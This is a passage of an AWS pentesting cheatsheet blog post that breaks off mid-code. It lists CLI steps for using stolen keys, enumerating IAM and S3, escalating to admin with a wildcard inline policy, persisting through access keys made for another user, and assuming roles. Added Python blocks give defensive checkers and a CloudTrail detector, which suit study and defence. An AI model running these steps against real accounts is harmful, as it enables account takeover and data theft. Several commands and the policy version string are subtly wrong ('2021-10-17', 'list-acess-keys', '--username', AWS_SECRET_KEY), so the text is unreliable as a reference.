<p>AWSome Pentesting Cheatsheet, by pop3ret, published 2022-10-05 on Untrustaland (a blog about hacking): https://www.untrustaland.com/blog/awsome-pentesting</p>
<p>This guide was created to help pentesters learn more about AWS misconfigurations and ways to abuse them.</p>
<ul>
<li>It was created from my notes, gathered over countless hours of study, and annotations from various places</li>
<li>It’s assumed that you have the AWS keys (<del>This is not difficult to find, just look in the developer’s GitHub</del>)</li>
<li>Author -> pop3ret</li>
</ul>
<h1 id="general-guidelines-and-tools">General Guidelines and tools</h1>
<ul>
<li><a href="https://github.com/nccgroup/ScoutSuite">Scout Suite</a> -> Security Healthcheck</li>
<li><a href="https://github.com/RhinoSecurityLabs/pacu">Pacu</a> -> AWS Exploitation Framework</li>
<li><a href="">https://github.com/cyberark/SkyArk</a> -> Discover most privileged users within AWS infrastructure</li>
<li><a href="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html">Boto3</a> -> AWS SDK for python</li>
<li><a href="https://github.com/NetSPI/aws_consoler">AWS Consoler</a> -> Convert AWS Credentials into a console access</li>
</ul>
<h1 id="aws-cheatsheet">AWS Cheatsheet</h1>
<h2 id="searching-for-open-buckets">Searching for open buckets</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://buckets.grayhatwarfare.com/
</code></pre></div></div>
<h2 id="arn">ARN</h2>
<p>An Amazon Resource Name (ARN) uniquely identifies a resource in AWS</p>
<p>Example</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>arn:aws:iam::100:user/admin
</code></pre></div></div>
<ol>
<li>Field -> ARN</li>
<li>Field -> Type, most of the time this will be AWS</li>
<li>Field -> service, in this case IAM</li>
<li>Field -> User ID</li>
<li>Field -> entity identifier</li>
</ol>
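<p>As an added example (not part of the original cheatsheet), a small parser for the ARN layout. The canonical form has six colon-separated fields, <code class="language-plaintext highlighter-rouge">arn:partition:service:region:account-id:resource</code>; region is left empty for global services such as IAM and S3, which is why the IAM example carries a double colon, and the resource part may itself contain colons or slashes. The IAM ARN with account id 100 is the page's own example; the Lambda and S3 ARNs are constructed.</p>

```python
from dataclasses import dataclass
from typing import Optional

# Canonical ARN layout: arn:partition:service:region:account-id:resource
# region is empty for global services (IAM, S3); the resource part may itself
# contain ':' or '/', so it is taken as "everything after the fifth colon".


@dataclass(frozen=True)
class Arn:
    partition: str
    service: str
    region: str
    account_id: str
    resource: str

    @property
    def is_global(self) -> bool:
        """True for services that carry no region, e.g. IAM or S3."""
        return self.region == ""

    def _split_resource(self):
        # S3 ARNs carry no type prefix: the resource is just bucket[/key].
        if self.service == "s3":
            return None, self.resource
        # IAM uses "type/name" (user/admin); Lambda uses "type:name"
        # (function:my-func). Whichever separator comes first wins.
        idx = [i for i in (self.resource.find("/"), self.resource.find(":")) if i >= 0]
        if not idx:
            return None, self.resource
        cut = min(idx)
        return self.resource[:cut], self.resource[cut + 1:]

    @property
    def resource_type(self) -> Optional[str]:
        return self._split_resource()[0]

    @property
    def resource_name(self) -> str:
        return self._split_resource()[1]


def parse_arn(arn: str) -> Arn:
    """Parse an ARN string; raises ValueError for anything not in the six-field layout."""
    parts = arn.split(":", 5)  # at most 6 pieces; the resource keeps its own colons
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not a well-formed ARN: {arn!r}")
    _, partition, service, region, account_id, resource = parts
    if not partition or not service or not resource:
        raise ValueError(f"partition, service and resource are mandatory: {arn!r}")
    if account_id and not account_id.isdigit():
        raise ValueError(f"account id must be numeric: {arn!r}")
    return Arn(partition, service, region, account_id, resource)


def same_account(a: str, b: str) -> bool:
    """Handy when reviewing trust policies: do two ARNs belong to the same account?"""
    return parse_arn(a).account_id == parse_arn(b).account_id


if __name__ == "__main__":
    for sample in ("arn:aws:iam::100:user/admin",                            # the cheatsheet's example
                   "arn:aws:lambda:us-east-1:123456789012:function:my-func",  # constructed
                   "arn:aws:s3:::example-bucket/secret.txt"):                 # constructed
        a = parse_arn(sample)
        print(f"{sample}\n  service={a.service} region={a.region or '(global)'} "
              f"account={a.account_id or '(none)'} type={a.resource_type} name={a.resource_name}")
```

<p>A five-field string such as <code class="language-plaintext highlighter-rouge">arn:aws:iam:100:user/admin</code> (region field missing) is rejected by the parser, which is the check worth having when ARNs are copied by hand into policies.</p>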
<h1 id="iam">IAM</h1>
<ul>
<li>It’s assumed that we have gained access to the AWS credentials</li>
<li>We can see which permissions we have using <a href="https://policysim.aws.amazon.com/">Amazon’s policy simulator</a></li>
<li>Always look for policies and roles with the * symbol.</li>
<li>See which users do not have MFA enabled</li>
<li>Enumerate users and groups in the IAM panel</li>
<li>We can also enumerate roles from the same interface</li>
<li>Root user is super admin</li>
</ul>
<h2 id="configure-aws-cli">Configure AWS cli</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure
</code></pre></div></div>
<p>Or configure it using a profile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure --profile example_name
</code></pre></div></div>
<p>The credential file is located in <code class="language-plaintext highlighter-rouge">~/.aws/credentials</code></p>
<h2 id="listing-iam-access-keys">Listing IAM access Keys</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-acess-keys
</code></pre></div></div>
<h2 id="1-enumerating-iam-users">1. Enumerating IAM users</h2>
<h3 id="checking-credentials-for-the-user">Checking credentials for the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="listing-iam-users">Listing IAM Users</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-users
</code></pre></div></div>
<h3 id="listing-the-iam-groups-that-the-specified-iam-user-belongs-to">Listing the IAM groups that the specified IAM user belongs to</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-groups-for-user --user-name user-name
</code></pre></div></div>
<h3 id="listing-all-manages-policies-that-are-attached-to-the-specified-iam-user">Listing all manages policies that are attached to the specified IAM user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-user">Listing the names of the inline policies embedded in the specified IAM user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-user-policies --user-name user-name
</code></pre></div></div>
<h2 id="2-enumeration-groups-iam">2. Enumeration Groups IAM</h2>
<h3 id="listing-iam-groups">Listing IAM Groups</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-groups
</code></pre></div></div>
<h3 id="listing-all-managed-policies-that-are-attached-to-the-specified-iam-group">Listing all managed policies that are attached to the specified IAM Group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-group-policies --group-name group-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-group">Listing the names of the inline policies embedded in the specified IAM Group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-group-policies --group-name group name
</code></pre></div></div>
<h2 id="3-enumeratig-roles">3. Enumeratig Roles</h2>
<h3 id="listing-iam-roles">Listing IAM Roles</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-roles
</code></pre></div></div>
<h3 id="listsing-all-managed-policies-that-are-attached-to-the-specified-iam-role">Listsing all managed policies that are attached to the specified IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name role-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-role">Listing the names of the inline policies embedded in the specified IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-role-policies --role-name role-name
</code></pre></div></div>
<h2 id="4-enumerating-policies">4. Enumerating Policies</h2>
<h3 id="listing-of-iam-policies">Listing of IAM Policies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policies
</code></pre></div></div>
<h3 id="retrieving-information-about-the-specified-managed-policy">Retrieving information about the specified managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn policy-arn
</code></pre></div></div>
<h3 id="listing-information-about-the-versions-of-the-specified-manages-policy">Listing information about the versions of the specified manages policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn policy-arn
</code></pre></div></div>
<h3 id="retrieving-information-about-the-specific-version-of-the-specified-managed-policy">Retrieving information about the specific version of the specified managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy-arn --version-id version-id
</code></pre></div></div>
<h3 id="retrieving-the-specified-inline-policy-document-that-is-embedded-on-the-specified-iam-user--group--role">Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-user-policy --user-name user-name --policy-name policy-name
aws iam get-group-policy --group-name group-name --policy-name policy-name
aws iam get-role-policy --role-name role-name --policy-name policy-name
</code></pre></div></div>
<h2 id="5-exploitation-scenario">5. Exploitation Scenario</h2>
<h3 id="general-guidelines">General Guidelines</h3>
<ul>
<li>An AWS token has been compromised (developer machine, phishing, etc.) and we, as attackers, are going to use it.</li>
</ul>
<h3 id="enumerating-the-owner-of-the-key-and-initial-compromise">Enumerating the owner of the key and initial compromise</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<p>Or specifying a profile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity --profile example_name
</code></pre></div></div>
<p>If you have the password of the root account instead of a key, log in at</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://signin.aws.amazon.com/console
</code></pre></div></div>
<p>Or use the IAM sign-in URL in case the account is not the root</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://account-id-here.signin.aws.amazon.com/console
</code></pre></div></div>
<p><em>The account ID can be gathered using the <code class="language-plaintext highlighter-rouge">sts get-caller-identity</code> command.</em></p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<ul>
<li>Privilege escalation on AWS is based on misconfigurations: if we have more permissions than necessary, it’s possible to obtain higher privileges.</li>
</ul>
<h4 id="study-case">Study Case</h4>
<ul>
<li>A user with the <em>List Policy</em> and <em>Put User Policy</em> permissions was compromised; an attacker could leverage the <em>Put User Policy</em> privilege to add an inline administrator policy to that same user, making it an administrator of the account.</li>
</ul>
<h5 id="exploitation">Exploitation</h5>
<ol>
<li>Getting the IAM user</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<ol start="2">
<li>Listing policies attached to a user</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name example_name --profile example_profile
</code></pre></div></div>
<ol start="3">
<li>Retrieving information about a specific policy</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn policy_arn
</code></pre></div></div>
<p>If there is more than one version of the policy, we can also list them</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn policy_arn
</code></pre></div></div>
<p>Now we can finally retrieve the contents of the policy</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn example_arn --version-id id_example
</code></pre></div></div>
<p><em>It’s important to use the command above to check the information about the default version of the policy</em></p>
<ol start="4">
<li>Escalation</li>
</ol>
<p>If we have the PutUserPolicy permission, we can add an inline administrator policy to our user.</p>
<p>Administrator policy example</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2021-10-17"</span><span class="p">,</span><span class="w">
</span><span class="nl">"Statement"</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="p">{</span><span class="w">
</span><span class="nl">"Effect"</span><span class="p">:</span><span class="s2">"Allow"</span><span class="p">,</span><span class="w">
</span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"*"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"Resource"</span><span class="p">:[</span><span class="w">
</span><span class="s2">"*"</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<h3 id="attaching-this-policy-into-our-user">Attaching this policy into our user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json
</code></pre></div></div>
<h3 id="listing-inline-policies-of-our-user">Listing inline policies of our user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-user-policies --user-name example_name
</code></pre></div></div>
<h3 id="listing-a-restricted-resource-example-s3">Listing a restricted resource (Example S3)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3 ls --profile example_profile
</code></pre></div></div>
<h3 id="interesting-permissions">Interesting Permissions</h3>
<ul>
<li>iam:AttachUserPolicy -> Attach a policy to a user</li>
<li>iam:AttachGroupPolicy -> Attach a policy to a group</li>
<li>iam:AttachRolePolicy -> Attach a policy to a role</li>
<li>iam:CreateAccessKey -> Creates a new access key</li>
<li>iam:CreateLoginProfile -> Creates a new login profile</li>
<li>iam:UpdateLoginProfile -> Update an existing login profile</li>
<li>iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile</li>
<li>iam:PutUserPolicy -> Create/Update an inline policy for a user</li>
<li>iam:PutGroupPolicy -> Create/Update an inline policy for a group</li>
<li>iam:PutRolePolicy -> Create/Update an inline policy for a role</li>
<li>iam:AddUserToGroup -> Add a user to a group</li>
<li>iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role</li>
<li>iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it</li>
<li>lambda:UpdateFunctionCode -> Update the code of an existing lambda function</li>
</ul>
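<p>The two checks this section asks for (policies carrying the * symbol, and the permission sets in the list above) can be automated over the JSON that <code class="language-plaintext highlighter-rouge">get-policy-version</code> and <code class="language-plaintext highlighter-rouge">get-user-policy</code> return. The following is an added example and not code from the original post: it applies IAM's wildcard semantics for <code class="language-plaintext highlighter-rouge">Action</code> (case-insensitive, <code class="language-plaintext highlighter-rouge">iam:Put*</code> style globs, explicit <code class="language-plaintext highlighter-rouge">Deny</code> wins) and reports which escalation paths a document grants. Resources and Conditions are deliberately ignored, so the result is an upper bound to be confirmed in the policy simulator. The admin document is the page's own; the study-case and deny-IAM policies are constructed.</p>

```python
import fnmatch
from typing import Dict, List, Tuple

# Escalation paths taken from the "Interesting Permissions" list. Every action
# in a tuple must be granted for the path to be reported.
ESCALATION_PATHS: Dict[str, Tuple[str, ...]] = {
    "attach-user-policy": ("iam:AttachUserPolicy",),
    "attach-group-policy": ("iam:AttachGroupPolicy",),
    "attach-role-policy": ("iam:AttachRolePolicy",),
    "create-access-key": ("iam:CreateAccessKey",),
    "create-login-profile": ("iam:CreateLoginProfile",),
    "update-login-profile": ("iam:UpdateLoginProfile",),
    "passrole-ec2": ("iam:PassRole", "ec2:RunInstances"),
    "put-user-policy": ("iam:PutUserPolicy",),
    "put-group-policy": ("iam:PutGroupPolicy",),
    "put-role-policy": ("iam:PutRolePolicy",),
    "add-user-to-group": ("iam:AddUserToGroup",),
    "update-assume-role-policy": ("iam:UpdateAssumeRolePolicy", "sts:AssumeRole"),
    "passrole-lambda": ("iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"),
    "update-function-code": ("lambda:UpdateFunctionCode",),
}

# The administrator policy from the cheatsheet, as a get-policy-version "Document".
ADMIN_POLICY = {"Version": "2012-10-17",
                "Statement": [{"Effect": "Allow", "Action": ["*"], "Resource": ["*"]}]}

# Constructed: the study case above, a user with ListPolicies + PutUserPolicy on itself.
STUDY_CASE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:ListPolicies", "iam:PutUserPolicy"],
     "Resource": "arn:aws:iam::123456789012:user/dev-alice"}]}

# Constructed: broad allow with an explicit deny on the whole IAM namespace.
DENY_IAM_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:*", "Resource": "*"}]}


def _as_list(value) -> list:
    """IAM lets Action/Resource/Statement be a single string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _patterns(policy: dict, effect: str) -> List[str]:
    """Lower-cased action patterns of every statement with the given Effect.
    NotAction is over-approximated as '*' (everything) for both Allow and Deny."""
    pats: List[str] = []
    for st in _as_list(policy.get("Statement")):
        if st.get("Effect") != effect:
            continue
        if "NotAction" in st:
            pats.append("*")
        pats.extend(a.lower() for a in _as_list(st.get("Action")))
    return pats


def action_granted(policy: dict, action: str) -> bool:
    """Wildcard matching for Action ('*', 'iam:*', 'iam:Put*'), case-insensitive;
    an explicit Deny overrides any Allow, as in IAM's evaluation logic."""
    a = action.lower()
    allowed = any(fnmatch.fnmatchcase(a, p) for p in _patterns(policy, "Allow"))
    denied = any(fnmatch.fnmatchcase(a, p) for p in _patterns(policy, "Deny"))
    return allowed and not denied


def wildcard_findings(policy: dict) -> List[str]:
    """The '*' check from the IAM notes: statements allowing every action or every resource."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue
        if "NotAction" in st or "*" in _as_list(st.get("Action")):
            findings.append(f"statement {i}: allows every action")
        if "NotResource" in st or "*" in _as_list(st.get("Resource")):
            findings.append(f"statement {i}: applies to every resource")
    return findings


def escalation_findings(policy: dict) -> List[str]:
    """Names of the escalation paths whose actions are all granted by the policy."""
    return sorted(name for name, actions in ESCALATION_PATHS.items()
                  if all(action_granted(policy, a) for a in actions))


if __name__ == "__main__":
    for label, doc in (("admin", ADMIN_POLICY), ("study-case", STUDY_CASE_POLICY),
                       ("deny-iam", DENY_IAM_POLICY)):
        print(label, wildcard_findings(doc), escalation_findings(doc))
```

<p>Running it over every inline and attached policy of a principal (the enumeration commands in sections 1 to 4 give you the documents) turns the manual "look for the * symbol" step into a repeatable review, and the study-case document above comes back with exactly one path, <code class="language-plaintext highlighter-rouge">put-user-policy</code>.</p>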
<h3 id="persistence--backdooring">Persistence & Backdooring</h3>
<ul>
<li>Suppose we have two users, and user A has permission to create access keys for user B. This misconfiguration allows us to create an access key for user B and persist our access.</li>
</ul>
<h4 id="creating-a-new-acess-key-for-another-user">Creating a new acess key for another user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam create-access-key --username example_username
</code></pre></div></div>
<h4 id="configuring-aws-cli-for-the-new-user">Configuring AWS cli for the new user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure --profile example_profile
</code></pre></div></div>
<p><em>Remember, a user can have a maximum of 2 access keys</em>.</p>
<h4 id="testing-the-credential">Testing the credential</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity --profile example_profile
</code></pre></div></div>
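<p>From the defender's side, both the study case (a user granting itself an inline policy) and the persistence trick above (a key created for a different user) leave distinct CloudTrail records. The following detector is an added example, not part of the original post; the records are constructed to mimic CloudTrail's layout (<code class="language-plaintext highlighter-rouge">eventName</code>, <code class="language-plaintext highlighter-rouge">userIdentity</code>, <code class="language-plaintext highlighter-rouge">requestParameters</code>), and the Lambda event names carry an API-version suffix in real trails (for example <code class="language-plaintext highlighter-rouge">UpdateFunctionCode20150331v2</code>), which is why they are matched by prefix. The user and function names are constructed.</p>

```python
import json
from typing import List, Optional, Tuple

# Constructed CloudTrail-style records (only the fields the detector reads).
SAMPLE_EVENTS = [
    {"eventID": "ev-1", "eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"}, "requestParameters": None},
    {"eventID": "ev-2", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"userName": "backup-svc"}},
    {"eventID": "ev-3", "eventSource": "iam.amazonaws.com", "eventName": "PutUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"userName": "dev-alice", "policyName": "admin"}},
    {"eventID": "ev-4", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"}, "requestParameters": None},
    {"eventID": "ev-5", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"functionName": "reporting"}},
]
# The same records as JSON-per-line, the shape a trail delivers after unpacking.
SAMPLE_LOG_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

Finding = Tuple[str, str]  # (category, description)


def _caller(event: dict) -> str:
    ident = event.get("userIdentity") or {}
    return ident.get("userName") or ident.get("arn") or "unknown"


def detect(event: dict) -> Optional[Finding]:
    """Return a finding for one record, or None if it is not one of the watched patterns."""
    name = event.get("eventName", "")
    caller = _caller(event)
    params = event.get("requestParameters") or {}
    # IAM resolves a missing userName to the caller: a key request without a
    # target is self-service, a key request naming another user is the
    # cross-user persistence case from this section.
    target = params.get("userName") or caller
    if name == "CreateAccessKey" and target != caller:
        return ("persistence", f"{caller} created an access key for {target}")
    if name in ("PutUserPolicy", "AttachUserPolicy") and target == caller:
        return ("privilege-escalation", f"{caller} changed its own policies via {name}")
    if name.startswith(("UpdateFunctionCode", "PublishLayerVersion")):
        what = params.get("functionName") or params.get("layerName") or "?"
        return ("persistence", f"{caller} replaced Lambda code via {name} on {what}")
    return None


def scan(log_lines) -> List[Tuple[str, str, str]]:
    """Run the detector over JSON-per-line records; returns (eventID, category, description)."""
    out = []
    for line in log_lines:
        event = json.loads(line)
        finding = detect(event)
        if finding:
            out.append((event.get("eventID", "?"),) + finding)
    return out


if __name__ == "__main__":
    for event_id, category, description in scan(SAMPLE_LOG_LINES):
        print(f"{event_id} [{category}] {description}")
```

<p>Record ev-4 (a user creating a key for itself) is intentionally not reported, since that is routine key rotation; the point of the check is the mismatch between caller and target.</p>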
<h4 id="accessing-more-credentials">Accessing more credentials</h4>
<ul>
<li>It’s possible to assume other roles with the sts:AssumeRole permission (Example: a user doesn’t have access to an S3 bucket, but it has this permission; we can easily assume other roles if we are in the trust relationship, increasing our access in the account)</li>
</ul>
<h5 id="listing-managed-policies-attached-to-an-user">Listing managed policies attached to an user</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name example_name
</code></pre></div></div>
<h5 id="retrieving-information-about-an-specific-policy">Retrieving information about an specific policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn ARN
</code></pre></div></div>
<h5 id="listing-information-about-the-version-of-the-policy">Listing information about the version of the policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn ARN
</code></pre></div></div>
<h5 id="retrieving-information-about-an-specific-version">Retrieving information about an specific version</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy_arn --version-id ID
</code></pre></div></div>
<h5 id="listing-iam-roles-1">Listing IAM roles</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-roles
</code></pre></div></div>
<h5 id="listing-trust-relashionship-between-role-and-user-which-roles-we-can-assume">Listing trust relashionship between role and user (Which roles we can assume)</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-role --role-name role_name
</code></pre></div></div>
<h5 id="listing-all-managed-policies-attached-to-the-specific-iam-role">Listing all managed policies attached to the specific IAM role</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam liast-attached-role-policies --role-name role_name
</code></pre></div></div>
<h5 id="retrieving-information-about-the-specified-version-of-the-policy">Retrieving information about the specified version of the policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy_arn --version-id ID
</code></pre></div></div>
<h5 id="getting-temporary-credentials-for-the-role">Getting temporary credentials for the role</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts assume-role --role-arn role_arn --role-session-name session_name
</code></pre></div></div>
<h5 id="configuring-aws-cli-with-newer-credentials-on-linux">Configuring AWS cli with newer credentials (On Linux)</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export AWS_ACCESS_KEY_ID
export AWS_SECRET_KEY
export AWS_SESSION_TOKEN
</code></pre></div></div>
<h5 id="getting-information-about-the-temporary-credential">Getting information about the temporary credential</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h1 id="s3---simple-storage-system">S3 - Simple Storage System</h1>
<ul>
<li>Storage system that allows users to store and retrieve data.</li>
<li>List, Get, Put and Delete operations can be performed on the objects of a bucket</li>
<li>Buckets are global, meaning that they are available to all regions</li>
<li>It’s possible to brute-force the bucket name and region in the URL</li>
<li>It’s possible to apply ACLs at the bucket and object level, and bucket policies at the bucket level</li>
<li>There are also time-limited URLs and identity-based policies</li>
<li>Identity policies are enumerated using IAM commands</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<h3 id="listing-all-buckets-in-aws-account">Listing all buckets in aws account</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api list-buckets
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-bucket">Getting information about a specific bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-bucket-acl --bucket name
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-bucket-policy">Getting information about a specific bucket policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-bucket-policy --bucket name
</code></pre></div></div>
<h3 id="getting-the-public-access-block-configuration-for-an-s3-bucket">Getting the Public Access Block configuration for an S3 bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-public-access-block --bucket name
</code></pre></div></div>
<h3 id="listing-all-objects-in-a-specific-bucket">Listing all objects in a specific bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api list-objects --bucket name
</code></pre></div></div>
<h3 id="getting-acl-information-about-specific-object">Getting ACL information about specific object</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-object-acl --bucket-name name --key object_name
</code></pre></div></div>
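<p>The three outputs above (bucket ACL, bucket policy and Public Access Block) only make sense together: a public ACL grant is neutralised by <code class="language-plaintext highlighter-rouge">IgnorePublicAcls</code>, and an existing public bucket policy by <code class="language-plaintext highlighter-rouge">RestrictPublicBuckets</code>. The following is an added example, not part of the original post, that combines the three into one verdict for a bucket. It reads the JSON the s3api commands print (note that <code class="language-plaintext highlighter-rouge">get-bucket-policy</code> returns the document as a JSON string inside the <code class="language-plaintext highlighter-rouge">Policy</code> key); the ACL, policy and bucket name are constructed, and <code class="language-plaintext highlighter-rouge">pab=None</code> models the NoSuchPublicAccessBlockConfiguration error the CLI returns when no block is configured.</p>

```python
import json
from typing import Dict, List, Optional

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "AllUsers (anyone)",
                 AUTH_USERS: "AuthenticatedUsers (any AWS account)"}

# Constructed: what `aws s3api get-bucket-acl` prints for a world-readable bucket.
SAMPLE_ACL = {"Owner": {"ID": "ownerid"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "ownerid"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]}
PRIVATE_ACL = {"Owner": {"ID": "ownerid"}, "Grants": [SAMPLE_ACL["Grants"][0]]}

# Constructed: `aws s3api get-bucket-policy` returns the document as a JSON *string*.
SAMPLE_POLICY = {"Policy": json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"}]})}

# Constructed: `aws s3api get-public-access-block` with all four settings on.
HARDENED_PAB = {"PublicAccessBlockConfiguration": {
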